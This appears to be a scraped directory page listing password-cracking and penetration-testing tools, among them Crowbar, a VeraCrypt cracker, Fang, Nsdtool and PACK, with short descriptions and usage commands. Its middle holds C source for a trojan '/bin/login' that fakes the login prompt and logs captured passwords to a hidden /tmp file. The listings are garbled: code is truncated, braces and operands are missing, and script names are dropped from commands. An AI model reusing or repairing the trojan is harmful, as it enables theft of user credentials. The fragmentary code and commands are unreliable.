Password Cracker

Takes passwords to plaintext, via various means (usually bruteforce)


Nice tool for checking all the URLs in an input text file and scanning them sequentially. Its primary purpose is to verify if the username and password for a website are valid but can also check if pages exist or not.


Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example, while most brute forcing tools use username and password for SSH brute force, Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests, to be used to attack other SSH servers.

Currently Crowbar supports:
OpenVPN (-b openvpn)
Remote Desktop Protocol (RDP) with NLA support (-b rdp)
SSH private key authentication (-b sshkey)
VNC key authentication (-b vpn)


Veracrypt Password Cracker
This script will go through a list of passwords and try these against the specified volume. If succeeded, it will mount the partition.

Note: This project is currently only working under Python 3.x on Windows and Linux systems.
Note: No dependencies are needed, but VeraCrypt has to be installed.


This tool applies a brute force method against various types of hashes to try and crack them. Currently, the supported hashes are:

It tries to be more efficient by parallelizing the work performed on different character sets. For example, if the character set abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ is selected then one worker will work with abcdefghijklmnopqrstuvwxyz, another worker will work with ABCDEFGHIJKLMNOPQRSTUVWXYZ, and the last worker will work with abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.


Python 3


The aim of this python script is to run in addition with Responder while doing internal assessments. This script will monitor the logs from Responder, loads NTLMv1 and NTLMv2 on the fly and crack them with your instance of Hashcat. Locally.

Penetration Testers Framework

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.


Fang is a multi service threaded MD5 cracker

POST|[hashToSearch:{HASH},searchHash:Search]|Plain text \: ]*>([^<]+)
POST|[hash:{HASH},submit:Decrypt+It%21]|>Decrypted Text: <\/b>(.+)<\/font>
GET|{HASH}|name="string" value="(.+)" id="form_string" maxlength="255" size="40" />
POST|[md5:{HASH},x:23,y:8]|Hashed string: (.+)\s*
POST|[hash:{HASH},get_pass:Get+Pass]|Password - (.+)\s*

# This file is part of Fang.
# Copyright(c) 2010-2011 Simone Margaritelli
# [email protected]
# <a href="<br />
#<br />
#" title="<br />
#<br />
#"><br />
#<br />
#</a> This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
# You should have received a copy of the GPL along with this
# program. If not, go to <a href="<br />
#" title="<br />
#"><br />
#</a> or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

import getopt, sys, os, urllib, urllib2, re, urlparse, os, threading, signal
from optparse import OptionParser, OptionGroup

class Service(threading.Thread):
def __init__ ( self, type, url, regex, exit_on_match, hash ):

self.type = type
self.url = url

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.


Trojan /bin/login.

/* tl0gin 0.1 (c)oded by m4rc3l0 in 11/09/2002(putz)  *
 *              *
 * Greetz: BashX, roadhouse, sinner, decodi, r0ot, hts,  *
 * midnight, behael, dacker, seed, m4st, mor_PH_eus,  *
 * eSc2, anjinh0, bionatus..        *
 *              *
 * Mail-me: <a href="mailto:[email protected]">[email protected]</a>      */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>

/* Error */
#define ERROR1 "Login incorrect"

/* Arquive */
#define ARQUI "/tmp/.tl0101"

/* Others */
#define MAX 500
#define ERRO -1
#define LOGIN "/bin/login"

void banner();
void loga();
void retorna();
int pega_info();
int grava_arq(char login[100], char passwd[100]);

char sys_name[100];
char sys_release[100];

int main()
    FILE *fp;

    signal(SIGINT, retorna);
    signal(SIGSTOP, retorna);
    signal(SIGQUIT, retorna);


void loga() {
    int pid;
    char login[MAX], passwd[MAX], esconde[MAX], hostname[MAX];
    char *pass;
    pid = getppid();
    gethostname(hostname, sizeof(hostname));

    for(;;) {
  for(;;) {

      printf("%s login: ", hostname);

      if(strcmp(login, "") != )
    goto PRIMEIRO;

      pass = (char *)getpass ("Password: ");
      printf("%s\n\n", ERROR1);
      if(strlen(login) >= 3)
    goto SEGUNDO;
  grava_arq(login, pass);
  kill(pid, 9);
  execl(LOGIN, "", NULL);

int pega_info() {
    struct utsname info;

    if(uname(&info) == -1) {
  return -1;

    sprintf(sys_name, "%s", info.sysname);
    sprintf(sys_release, "%s", info.release);

PACK - Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

The most basic analysis that you can perform is simply obtaining most common length, character-set and other characteristics of passwords in the provided list. In the example below, we will use 'rockyou.txt' containing approximately 14 million passwords. Launch with the following command line:
$ python rockyou.txt

Using filters
Let's see how RockYou users tend to select their passwords using the "stringdigit" simple mask (a string followed by numbers):
$ python ../PACK-0.0.3/archive/rockyou.txt --simplemask stringdigit -q --hiderare

Saving advanced masks
While the "Advanced Mask" section only displays patterns matching greater than 1% of all passwords, you can obtain and save a full list of password masks matching a given dictionary by using the following command:
$ python rockyou.txt -o rockyou.masks

MaskGen allows you to craft pattern-based mask attacks for input into Hashcat family of password crackers. The tool uses output produced by statsgen above with the '-o' flag in order to produce the most optimal mask attack sorted by mask complexity, mask occurrence or ratio of the two (optimal index).
Let's run MaskGen with only StatGen's output as an argument:
$ python rockyou.masks

Specifying target time

Syndicate content